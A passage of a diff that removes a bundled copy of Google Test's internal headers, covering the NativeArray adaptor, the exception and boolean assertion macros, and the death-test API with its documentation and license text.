-  internal::CopyArray(from, N, *to);
-}
-
-// This helper reduces code bloat.  If we instead put its logic inside
-// the previous CopyArray() function, arrays with different sizes
-// would lead to different copies of the template code.
-template <typename T, typename U>
-void CopyArray(const T* from, size_t size, U* to) {
-  for (size_t i = 0; i != size; i++) {
-    internal::CopyArray(from[i], to + i);
-  }
-}
-
-// The relation between an NativeArray object (see below) and the
-// native array it represents.
-// We use 2 different structs to allow non-copyable types to be used, as long
-// as RelationToSourceReference() is passed.
-struct RelationToSourceReference {};
-struct RelationToSourceCopy {};
-
-// Adapts a native array to a read-only STL-style container.  Instead
-// of the complete STL container concept, this adaptor only implements
-// members useful for Google Mock's container matchers.  New members
-// should be added as needed.  To simplify the implementation, we only
-// support Element being a raw type (i.e. having no top-level const or
-// reference modifier).  It's the client's responsibility to satisfy
-// this requirement.  Element can be an array type itself (hence
-// multi-dimensional arrays are supported).
-template <typename Element>
-class NativeArray {
- public:
-  // STL-style container typedefs.
-  typedef Element value_type;
-  typedef Element* iterator;
-  typedef const Element* const_iterator;
-
-  // Constructs from a native array. References the source.
-  NativeArray(const Element* array, size_t count, RelationToSourceReference) {
-    InitRef(array, count);
-  }
-
-  // Constructs from a native array. Copies the source.
-  NativeArray(const Element* array, size_t count, RelationToSourceCopy) {
-    InitCopy(array, count);
-  }
-
-  // Copy constructor.
-  NativeArray(const NativeArray& rhs) {
-    (this->*rhs.clone_)(rhs.array_, rhs.size_);
-  }
-
-  ~NativeArray() {
-    if (clone_ != &NativeArray::InitRef)
-      delete[] array_;
-  }
-
-  // STL-style container methods.
-  size_t size() const { return size_; }
-  const_iterator begin() const { return array_; }
-  const_iterator end() const { return array_ + size_; }
-  bool operator==(const NativeArray& rhs) const {
-    return size() == rhs.size() &&
-        ArrayEq(begin(), size(), rhs.begin());
-  }
-
- private:
-  enum {
-    kCheckTypeIsNotConstOrAReference = StaticAssertTypeEqHelper<
-        Element, GTEST_REMOVE_REFERENCE_AND_CONST_(Element)>::value,
-  };
-
-  // Initializes this object with a copy of the input.
-  void InitCopy(const Element* array, size_t a_size) {
-    Element* const copy = new Element[a_size];
-    CopyArray(array, a_size, copy);
-    array_ = copy;
-    size_ = a_size;
-    clone_ = &NativeArray::InitCopy;
-  }
-
-  // Initializes this object with a reference of the input.
-  void InitRef(const Element* array, size_t a_size) {
-    array_ = array;
-    size_ = a_size;
-    clone_ = &NativeArray::InitRef;
-  }
-
-  const Element* array_;
-  size_t size_;
-  void (NativeArray::*clone_)(const Element*, size_t);
-
-  GTEST_DISALLOW_ASSIGN_(NativeArray);
-};
-
-}  // namespace internal
-}  // namespace testing
-
-#define GTEST_MESSAGE_AT_(file, line, message, result_type) \
-  ::testing::internal::AssertHelper(result_type, file, line, message) \
-    = ::testing::Message()
-
-#define GTEST_MESSAGE_(message, result_type) \
-  GTEST_MESSAGE_AT_(__FILE__, __LINE__, message, result_type)
-
-#define GTEST_FATAL_FAILURE_(message) \
-  return GTEST_MESSAGE_(message, ::testing::TestPartResult::kFatalFailure)
-
-#define GTEST_NONFATAL_FAILURE_(message) \
-  GTEST_MESSAGE_(message, ::testing::TestPartResult::kNonFatalFailure)
-
-#define GTEST_SUCCESS_(message) \
-  GTEST_MESSAGE_(message, ::testing::TestPartResult::kSuccess)
-
-// Suppresses MSVC warnings 4072 (unreachable code) for the code following
-// statement if it returns or throws (or doesn't return or throw in some
-// situations).
-#define GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement) \
-  if (::testing::internal::AlwaysTrue()) { statement; }
-
-#define GTEST_TEST_THROW_(statement, expected_exception, fail) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (::testing::internal::ConstCharPtr gtest_msg = "") { \
-    bool gtest_caught_expected = false; \
-    try { \
-      GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement); \
-    } \
-    catch (expected_exception const&) { \
-      gtest_caught_expected = true; \
-    } \
-    catch (...) { \
-      gtest_msg.value = \
-          "Expected: " #statement " throws an exception of type " \
-          #expected_exception ".\n  Actual: it throws a different type."; \
-      goto GTEST_CONCAT_TOKEN_(gtest_label_testthrow_, __LINE__); \
-    } \
-    if (!gtest_caught_expected) { \
-      gtest_msg.value = \
-          "Expected: " #statement " throws an exception of type " \
-          #expected_exception ".\n  Actual: it throws nothing."; \
-      goto GTEST_CONCAT_TOKEN_(gtest_label_testthrow_, __LINE__); \
-    } \
-  } else \
-    GTEST_CONCAT_TOKEN_(gtest_label_testthrow_, __LINE__): \
-      fail(gtest_msg.value)
-
-#define GTEST_TEST_NO_THROW_(statement, fail) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (::testing::internal::AlwaysTrue()) { \
-    try { \
-      GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement); \
-    } \
-    catch (...) { \
-      goto GTEST_CONCAT_TOKEN_(gtest_label_testnothrow_, __LINE__); \
-    } \
-  } else \
-    GTEST_CONCAT_TOKEN_(gtest_label_testnothrow_, __LINE__): \
-      fail("Expected: " #statement " doesn't throw an exception.\n" \
-           "  Actual: it throws.")
-
-#define GTEST_TEST_ANY_THROW_(statement, fail) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (::testing::internal::AlwaysTrue()) { \
-    bool gtest_caught_any = false; \
-    try { \
-      GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement); \
-    } \
-    catch (...) { \
-      gtest_caught_any = true; \
-    } \
-    if (!gtest_caught_any) { \
-      goto GTEST_CONCAT_TOKEN_(gtest_label_testanythrow_, __LINE__); \
-    } \
-  } else \
-    GTEST_CONCAT_TOKEN_(gtest_label_testanythrow_, __LINE__): \
-      fail("Expected: " #statement " throws an exception.\n" \
-           "  Actual: it doesn't.")
-
-
-// Implements Boolean test assertions such as EXPECT_TRUE. expression can be
-// either a boolean expression or an AssertionResult. text is a textual
-// represenation of expression as it was passed into the EXPECT_TRUE.
-#define GTEST_TEST_BOOLEAN_(expression, text, actual, expected, fail) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (const ::testing::AssertionResult gtest_ar_ = \
-      ::testing::AssertionResult(expression)) \
-    ; \
-  else \
-    fail(::testing::internal::GetBoolAssertionFailureMessage(\
-        gtest_ar_, text, #actual, #expected).c_str())
-
-#define GTEST_TEST_NO_FATAL_FAILURE_(statement, fail) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (::testing::internal::AlwaysTrue()) { \
-    ::testing::internal::HasNewFatalFailureHelper gtest_fatal_failure_checker; \
-    GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement); \
-    if (gtest_fatal_failure_checker.has_new_fatal_failure()) { \
-      goto GTEST_CONCAT_TOKEN_(gtest_label_testnofatal_, __LINE__); \
-    } \
-  } else \
-    GTEST_CONCAT_TOKEN_(gtest_label_testnofatal_, __LINE__): \
-      fail("Expected: " #statement " doesn't generate new fatal " \
-           "failures in the current thread.\n" \
-           "  Actual: it does.")
-
-// Expands to the name of the class that implements the given test.
-#define GTEST_TEST_CLASS_NAME_(test_case_name, test_name) \
-  test_case_name##_##test_name##_Test
-
-// Helper macro for defining tests.
-#define GTEST_TEST_(test_case_name, test_name, parent_class, parent_id)\
-class GTEST_TEST_CLASS_NAME_(test_case_name, test_name) : public parent_class {\
- public:\
-  GTEST_TEST_CLASS_NAME_(test_case_name, test_name)() {}\
- private:\
-  virtual void TestBody();\
-  static ::testing::TestInfo* const test_info_ GTEST_ATTRIBUTE_UNUSED_;\
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(\
-      GTEST_TEST_CLASS_NAME_(test_case_name, test_name));\
-};\
-\
-::testing::TestInfo* const GTEST_TEST_CLASS_NAME_(test_case_name, test_name)\
-  ::test_info_ =\
-    ::testing::internal::MakeAndRegisterTestInfo(\
-        #test_case_name, #test_name, NULL, NULL, \
-        (parent_id), \
-        parent_class::SetUpTestCase, \
-        parent_class::TearDownTestCase, \
-        new ::testing::internal::TestFactoryImpl<\
-            GTEST_TEST_CLASS_NAME_(test_case_name, test_name)>);\
-void GTEST_TEST_CLASS_NAME_(test_case_name, test_name)::TestBody()
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_INTERNAL_H_
-
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-//
-// The Google C++ Testing Framework (Google Test)
-//
-// This header file defines the public API for death tests.  It is
-// #included by gtest.h so a user doesn't need to include this
-// directly.
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_DEATH_TEST_H_
-#define GTEST_INCLUDE_GTEST_GTEST_DEATH_TEST_H_
-
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Authors: wan@google.com (Zhanyong Wan), eefacm@gmail.com (Sean Mcafee)
-//
-// The Google C++ Testing Framework (Google Test)
-//
-// This header file defines internal utilities needed for implementing
-// death tests.  They are subject to change without notice.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_DEATH_TEST_INTERNAL_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_DEATH_TEST_INTERNAL_H_
-
-
-#include <stdio.h>
-
-namespace testing {
-namespace internal {
-
-GTEST_DECLARE_string_(internal_run_death_test);
-
-// Names of the flags (needed for parsing Google Test flags).
-const char kDeathTestStyleFlag[] = "death_test_style";
-const char kDeathTestUseFork[] = "death_test_use_fork";
-const char kInternalRunDeathTestFlag[] = "internal_run_death_test";
-
-#if GTEST_HAS_DEATH_TEST
-
-// DeathTest is a class that hides much of the complexity of the
-// GTEST_DEATH_TEST_ macro.  It is abstract; its static Create method
-// returns a concrete class that depends on the prevailing death test
-// style, as defined by the --gtest_death_test_style and/or
-// --gtest_internal_run_death_test flags.
-
-// In describing the results of death tests, these terms are used with
-// the corresponding definitions:
-//
-// exit status:  The integer exit information in the format specified
-//               by wait(2)
-// exit code:    The integer code passed to exit(3), _exit(2), or
-//               returned from main()
-class GTEST_API_ DeathTest {
- public:
-  // Create returns false if there was an error determining the
-  // appropriate action to take for the current death test; for example,
-  // if the gtest_death_test_style flag is set to an invalid value.
-  // The LastMessage method will return a more detailed message in that
-  // case.  Otherwise, the DeathTest pointer pointed to by the "test"
-  // argument is set.  If the death test should be skipped, the pointer
-  // is set to NULL; otherwise, it is set to the address of a new concrete
-  // DeathTest object that controls the execution of the current test.
-  static bool Create(const char* statement, const RE* regex,
-                     const char* file, int line, DeathTest** test);
-  DeathTest();
-  virtual ~DeathTest() { }
-
-  // A helper class that aborts a death test when it's deleted.
-  class ReturnSentinel {
-   public:
-    explicit ReturnSentinel(DeathTest* test) : test_(test) { }
-    ~ReturnSentinel() { test_->Abort(TEST_ENCOUNTERED_RETURN_STATEMENT); }
-   private:
-    DeathTest* const test_;
-    GTEST_DISALLOW_COPY_AND_ASSIGN_(ReturnSentinel);
-  } GTEST_ATTRIBUTE_UNUSED_;
-
-  // An enumeration of possible roles that may be taken when a death
-  // test is encountered.  EXECUTE means that the death test logic should
-  // be executed immediately.  OVERSEE means that the program should prepare
-  // the appropriate environment for a child process to execute the death
-  // test, then wait for it to complete.
-  enum TestRole { OVERSEE_TEST, EXECUTE_TEST };
-
-  // An enumeration of the three reasons that a test might be aborted.
-  enum AbortReason {
-    TEST_ENCOUNTERED_RETURN_STATEMENT,
-    TEST_THREW_EXCEPTION,
-    TEST_DID_NOT_DIE
-  };
-
-  // Assumes one of the above roles.
-  virtual TestRole AssumeRole() = 0;
-
-  // Waits for the death test to finish and returns its status.
-  virtual int Wait() = 0;
-
-  // Returns true if the death test passed; that is, the test process
-  // exited during the test, its exit status matches a user-supplied
-  // predicate, and its stderr output matches a user-supplied regular
-  // expression.
-  // The user-supplied predicate may be a macro expression rather
-  // than a function pointer or functor, or else Wait and Passed could
-  // be combined.
-  virtual bool Passed(bool exit_status_ok) = 0;
-
-  // Signals that the death test did not die as expected.
-  virtual void Abort(AbortReason reason) = 0;
-
-  // Returns a human-readable outcome message regarding the outcome of
-  // the last death test.
-  static const char* LastMessage();
-
-  static void set_last_death_test_message(const std::string& message);
-
- private:
-  // A string containing a description of the outcome of the last death test.
-  static std::string last_death_test_message_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(DeathTest);
-};
-
-// Factory interface for death tests.  May be mocked out for testing.
-class DeathTestFactory {
- public:
-  virtual ~DeathTestFactory() { }
-  virtual bool Create(const char* statement, const RE* regex,
-                      const char* file, int line, DeathTest** test) = 0;
-};
-
-// A concrete DeathTestFactory implementation for normal use.
-class DefaultDeathTestFactory : public DeathTestFactory {
- public:
-  virtual bool Create(const char* statement, const RE* regex,
-                      const char* file, int line, DeathTest** test);
-};
-
-// Returns true if exit_status describes a process that was terminated
-// by a signal, or exited normally with a nonzero exit code.
-GTEST_API_ bool ExitedUnsuccessfully(int exit_status);
-
-// Traps C++ exceptions escaping statement and reports them as test
-// failures. Note that trapping SEH exceptions is not implemented here.
-# if GTEST_HAS_EXCEPTIONS
-#  define GTEST_EXECUTE_DEATH_TEST_STATEMENT_(statement, death_test) \
-  try { \
-    GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement); \
-  } catch (const ::std::exception& gtest_exception) { \
-    fprintf(\
-        stderr, \
-        "\n%s: Caught std::exception-derived exception escaping the " \
-        "death test statement. Exception message: %s\n", \
-        ::testing::internal::FormatFileLocation(__FILE__, __LINE__).c_str(), \
-        gtest_exception.what()); \
-    fflush(stderr); \
-    death_test->Abort(::testing::internal::DeathTest::TEST_THREW_EXCEPTION); \
-  } catch (...) { \
-    death_test->Abort(::testing::internal::DeathTest::TEST_THREW_EXCEPTION); \
-  }
-
-# else
-#  define GTEST_EXECUTE_DEATH_TEST_STATEMENT_(statement, death_test) \
-  GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement)
-
-# endif
-
-// This macro is for implementing ASSERT_DEATH*, EXPECT_DEATH*,
-// ASSERT_EXIT*, and EXPECT_EXIT*.
-# define GTEST_DEATH_TEST_(statement, predicate, regex, fail) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (::testing::internal::AlwaysTrue()) { \
-    const ::testing::internal::RE& gtest_regex = (regex); \
-    ::testing::internal::DeathTest* gtest_dt; \
-    if (!::testing::internal::DeathTest::Create(#statement, &gtest_regex, \
-        __FILE__, __LINE__, &gtest_dt)) { \
-      goto GTEST_CONCAT_TOKEN_(gtest_label_, __LINE__); \
-    } \
-    if (gtest_dt != NULL) { \
-      ::testing::internal::scoped_ptr< ::testing::internal::DeathTest> \
-          gtest_dt_ptr(gtest_dt); \
-      switch (gtest_dt->AssumeRole()) { \
-        case ::testing::internal::DeathTest::OVERSEE_TEST: \
-          if (!gtest_dt->Passed(predicate(gtest_dt->Wait()))) { \
-            goto GTEST_CONCAT_TOKEN_(gtest_label_, __LINE__); \
-          } \
-          break; \
-        case ::testing::internal::DeathTest::EXECUTE_TEST: { \
-          ::testing::internal::DeathTest::ReturnSentinel \
-              gtest_sentinel(gtest_dt); \
-          GTEST_EXECUTE_DEATH_TEST_STATEMENT_(statement, gtest_dt); \
-          gtest_dt->Abort(::testing::internal::DeathTest::TEST_DID_NOT_DIE); \
-          break; \
-        } \
-        default: \
-          break; \
-      } \
-    } \
-  } else \
-    GTEST_CONCAT_TOKEN_(gtest_label_, __LINE__): \
-      fail(::testing::internal::DeathTest::LastMessage())
-// The symbol "fail" here expands to something into which a message
-// can be streamed.
-
-// This macro is for implementing ASSERT/EXPECT_DEBUG_DEATH when compiled in
-// NDEBUG mode. In this case we need the statements to be executed, the regex is
-// ignored, and the macro must accept a streamed message even though the message
-// is never printed.
-# define GTEST_EXECUTE_STATEMENT_(statement, regex) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (::testing::internal::AlwaysTrue()) { \
-     GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement); \
-  } else \
-    ::testing::Message()
-
-// A class representing the parsed contents of the
-// --gtest_internal_run_death_test flag, as it existed when
-// RUN_ALL_TESTS was called.
-class InternalRunDeathTestFlag {
- public:
-  InternalRunDeathTestFlag(const std::string& a_file,
-                           int a_line,
-                           int an_index,
-                           int a_write_fd)
-      : file_(a_file), line_(a_line), index_(an_index),
-        write_fd_(a_write_fd) {}
-
-  ~InternalRunDeathTestFlag() {
-    if (write_fd_ >= 0)
-      posix::Close(write_fd_);
-  }
-
-  const std::string& file() const { return file_; }
-  int line() const { return line_; }
-  int index() const { return index_; }
-  int write_fd() const { return write_fd_; }
-
- private:
-  std::string file_;
-  int line_;
-  int index_;
-  int write_fd_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(InternalRunDeathTestFlag);
-};
-
-// Returns a newly created InternalRunDeathTestFlag object with fields
-// initialized from the GTEST_FLAG(internal_run_death_test) flag if
-// the flag is specified; otherwise returns NULL.
-InternalRunDeathTestFlag* ParseInternalRunDeathTestFlag();
-
-#else  // GTEST_HAS_DEATH_TEST
-
-// This macro is used for implementing macros such as
-// EXPECT_DEATH_IF_SUPPORTED and ASSERT_DEATH_IF_SUPPORTED on systems where
-// death tests are not supported. Those macros must compile on such systems
-// iff EXPECT_DEATH and ASSERT_DEATH compile with the same parameters on
-// systems that support death tests. This allows one to write such a macro
-// on a system that does not support death tests and be sure that it will
-// compile on a death-test supporting system.
-//
-// Parameters:
-//   statement -  A statement that a macro such as EXPECT_DEATH would test
-//                for program termination. This macro has to make sure this
-//                statement is compiled but not executed, to ensure that
-//                EXPECT_DEATH_IF_SUPPORTED compiles with a certain
-//                parameter iff EXPECT_DEATH compiles with it.
-//   regex     -  A regex that a macro such as EXPECT_DEATH would use to test
-//                the output of statement.  This parameter has to be
-//                compiled but not evaluated by this macro, to ensure that
-//                this macro only accepts expressions that a macro such as
-//                EXPECT_DEATH would accept.
-//   terminator - Must be an empty statement for EXPECT_DEATH_IF_SUPPORTED
-//                and a return statement for ASSERT_DEATH_IF_SUPPORTED.
-//                This ensures that ASSERT_DEATH_IF_SUPPORTED will not
-//                compile inside functions where ASSERT_DEATH doesn't
-//                compile.
-//
-//  The branch that has an always false condition is used to ensure that
-//  statement and regex are compiled (and thus syntactically correct) but
-//  never executed. The unreachable code macro protects the terminator
-//  statement from generating an 'unreachable code' warning in case
-//  statement unconditionally returns or throws. The Message constructor at
-//  the end allows the syntax of streaming additional messages into the
-//  macro, for compilational compatibility with EXPECT_DEATH/ASSERT_DEATH.
-# define GTEST_UNSUPPORTED_DEATH_TEST_(statement, regex, terminator) \
-    GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-    if (::testing::internal::AlwaysTrue()) { \
-      GTEST_LOG_(WARNING) \
-          << "Death tests are not supported on this platform.\n" \
-          << "Statement '" #statement "' cannot be verified."; \
-    } else if (::testing::internal::AlwaysFalse()) { \
-      ::testing::internal::RE::PartialMatch(".*", (regex)); \
-      GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement); \
-      terminator; \
-    } else \
-      ::testing::Message()
-
-#endif  // GTEST_HAS_DEATH_TEST
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_DEATH_TEST_INTERNAL_H_
-
-namespace testing {
-
-// This flag controls the style of death tests.  Valid values are "threadsafe",
-// meaning that the death test child process will re-execute the test binary
-// from the start, running only a single death test, or "fast",
-// meaning that the child process will execute the test logic immediately
-// after forking.
-GTEST_DECLARE_string_(death_test_style);
-
-#if GTEST_HAS_DEATH_TEST
-
-namespace internal {
-
-// Returns a Boolean value indicating whether the caller is currently
-// executing in the context of the death test child process.  Tools such as
-// Valgrind heap checkers may need this to modify their behavior in death
-// tests.  IMPORTANT: This is an internal utility.  Using it may break the
-// implementation of death tests.  User code MUST NOT use it.
-GTEST_API_ bool InDeathTestChild();
-
-}  // namespace internal
-
-// The following macros are useful for writing death tests.
-
-// Here's what happens when an ASSERT_DEATH* or EXPECT_DEATH* is
-// executed:
-//
-//   1. It generates a warning if there is more than one active
-//   thread.  This is because it's safe to fork() or clone() only
-//   when there is a single thread.
-//
-//   2. The parent process clone()s a sub-process and runs the death
-//   test in it; the sub-process exits with code 0 at the end of the
-//   death test, if it hasn't exited already.
-//
-//   3. The parent process waits for the sub-process to terminate.
-//
-//   4. The parent process checks the exit code and error message of
-//   the sub-process.
-//
-// Examples:
-//
-//   ASSERT_DEATH(server.SendMessage(56, "Hello"), "Invalid port number");
-//   for (int i = 0; i < 5; i++) {
-//     EXPECT_DEATH(server.ProcessRequest(i),
-//                  "Invalid request .* in ProcessRequest()")
-//                  << "Failed to die on request " << i;
-//   }
-//
-//   ASSERT_EXIT(server.ExitNow(), ::testing::ExitedWithCode(0), "Exiting");
-//
-//   bool KilledBySIGHUP(int exit_code) {
-//     return WIFSIGNALED(exit_code) && WTERMSIG(exit_code) == SIGHUP;
-//   }
-//
-//   ASSERT_EXIT(client.HangUpServer(), KilledBySIGHUP, "Hanging up!");
-//
-// On the regular expressions used in death tests:
-//
-//   On POSIX-compliant systems (*nix), we use the <regex.h> library,
-//   which uses the POSIX extended regex syntax.
-//
-//   On other platforms (e.g. Windows), we only support a simple regex
-//   syntax implemented as part of Google Test.  This limited
-//   implementation should be enough most of the time when writing
-//   death tests; though it lacks many features you can find in PCRE
-//   or POSIX extended regex syntax.  For example, we don't support
-//   union ("x|y"), grouping ("(xy)"), brackets ("[xy]"), and
-//   repetition count ("x{5,7}"), among others.
-//
-//   Below is the syntax that we do support.  We chose it to be a
-//   subset of both PCRE and POSIX extended regex, so it's easy to
-//   learn wherever you come from.  In the following: 'A' denotes a
-//   literal character, period (.), or a single \\ escape sequence;
-//   'x' and 'y' denote regular expressions; 'm' and 'n' are for
-//   natural numbers.
-//
-//     c     matches any literal character c
-//     \\d   matches any decimal digit
-//     \\D   matches any character that's not a decimal digit
-//     \\f   matches \f
-//     \\n   matches \n
-//     \\r   matches \r
-//     \\s   matches any ASCII whitespace, including \n
-//     \\S   matches any character that's not a whitespace
-//     \\t   matches \t
-//     \\v   matches \v
-//     \\w   matches any letter, _, or decimal digit
-//     \\W   matches any character that \\w doesn't match
-//     \\c   matches any literal character c, which must be a punctuation
-//     .     matches any single character except \n
-//     A?    matches 0 or 1 occurrences of A
-//     A*    matches 0 or many occurrences of A
-//     A+    matches 1 or many occurrences of A
-//     ^     matches the beginning of a string (not that of each line)
-//     $     matches the end of a string (not that of each line)
-//     xy    matches x followed by y
-//
-//   If you accidentally use PCRE or POSIX extended regex features
-//   not implemented by us, you will get a run-time failure.  In that
-//   case, please try to rewrite your regular expression within the
-//   above syntax.
-//
-//   This implementation is *not* meant to be as highly tuned or robust
-//   as a compiled regex library, but should perform well enough for a
-//   death test, which already incurs significant overhead by launching
-//   a child process.
-//
-// Known caveats:
-//
-//   A "threadsafe" style death test obtains the path to the test
-//   program from argv[0] and re-executes it in the sub-process.  For
-//   simplicity, the current implementation doesn't search the PATH
-//   when launching the sub-process.  This means that the user must
-//   invoke the test program via a path that contains at least one
-//   path separator (e.g. path/to/foo_test and
-//   /absolute/path/to/bar_test are fine, but foo_test is not).  This
-//   is rarely a problem as people usually don't put the test binary
-//   directory in PATH.
-//
-// TODO(wan@google.com): make thread-safe death tests search the PATH.
-
-// Asserts that a given statement causes the program to exit, with an
-// integer exit status that satisfies predicate, and emitting error output
-// that matches regex.
-# define ASSERT_EXIT(statement, predicate, regex) \
-    GTEST_DEATH_TEST_(statement, predicate, regex, GTEST_FATAL_FAILURE_)
-
-// Like ASSERT_EXIT, but continues on to successive tests in the
-// test case, if any:
-# define EXPECT_EXIT(statement, predicate, regex) \
-    GTEST_DEATH_TEST_(statement, predicate, regex, GTEST_NONFATAL_FAILURE_)
-
-// Asserts that a given statement causes the program to exit, either by
-// explicitly exiting with a nonzero exit code or being killed by a
-// signal, and emitting error output that matches regex.
-# define ASSERT_DEATH(statement, regex) \
-    ASSERT_EXIT(statement, ::testing::internal::ExitedUnsuccessfully, regex)
-
-// Like ASSERT_DEATH, but continues on to successive tests in the
-// test case, if any:
-# define EXPECT_DEATH(statement, regex) \
-    EXPECT_EXIT(statement, ::testing::internal::ExitedUnsuccessfully, regex)
-
-// Two predicate classes that can be used in {ASSERT,EXPECT}_EXIT*:
-
-// Tests that an exit code describes a normal exit with a given exit code.
-class GTEST_API_ ExitedWithCode {
- public:
-  explicit ExitedWithCode(int exit_code);
-  bool operator()(int exit_status) const;
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ExitedWithCode& other);
-
-  const int exit_code_;
-};
-
-# if !GTEST_OS_WINDOWS
-// Tests that an exit code describes an exit due to termination by a
-// given signal.
-class GTEST_API_ KilledBySignal {
- public:
-  explicit KilledBySignal(int signum);
-  bool operator()(int exit_status) const;
- private:
-  const int signum_;
-};
-# endif  // !GTEST_OS_WINDOWS
-
-// EXPECT_DEBUG_DEATH asserts that the given statements die in debug mode.
-// The death testing framework causes this to have interesting semantics,
-// since the sideeffects of the call are only visible in opt mode, and not
-// in debug mode.
-//
-// In practice, this can be used to test functions that utilize the
-// LOG(DFATAL) macro using the following style:
-//
-// int DieInDebugOr12(int* sideeffect) {
-//   if (sideeffect) {
-//     *sideeffect = 12;
-//   }
-//   LOG(DFATAL) << "death";
-//   return 12;
-// }
-//
-// TEST(TestCase, TestDieOr12WorksInDgbAndOpt) {
-//   int sideeffect = 0;
-//   // Only asserts in dbg.
-//   EXPECT_DEBUG_DEATH(DieInDebugOr12(&sideeffect), "death");
-//
-// #ifdef NDEBUG
-//   // opt-mode has sideeffect visible.
-//   EXPECT_EQ(12, sideeffect);
-// #else
-//   // dbg-mode no visible sideeffect.
-//   EXPECT_EQ(0, sideeffect);
-// #endif
-// }
-//
-// This will assert that DieInDebugReturn12InOpt() crashes in debug
-// mode, usually due to a DCHECK or LOG(DFATAL), but returns the
-// appropriate fallback value (12 in this case) in opt mode. If you
-// need to test that a function has appropriate side-effects in opt
-// mode, include assertions against the side-effects.  A general
-// pattern for this is:
-//
-// EXPECT_DEBUG_DEATH({
-//   // Side-effects here will have an effect after this statement in
-//   // opt mode, but none in debug mode.
-//   EXPECT_EQ(12, DieInDebugOr12(&sideeffect));
-// }, "death");
-//
-# ifdef NDEBUG
-
-#  define EXPECT_DEBUG_DEATH(statement, regex) \
-  GTEST_EXECUTE_STATEMENT_(statement, regex)
-
-#  define ASSERT_DEBUG_DEATH(statement, regex) \
-  GTEST_EXECUTE_STATEMENT_(statement, regex)
-
-# else
-
-#  define EXPECT_DEBUG_DEATH(statement, regex) \
-  EXPECT_DEATH(statement, regex)
-
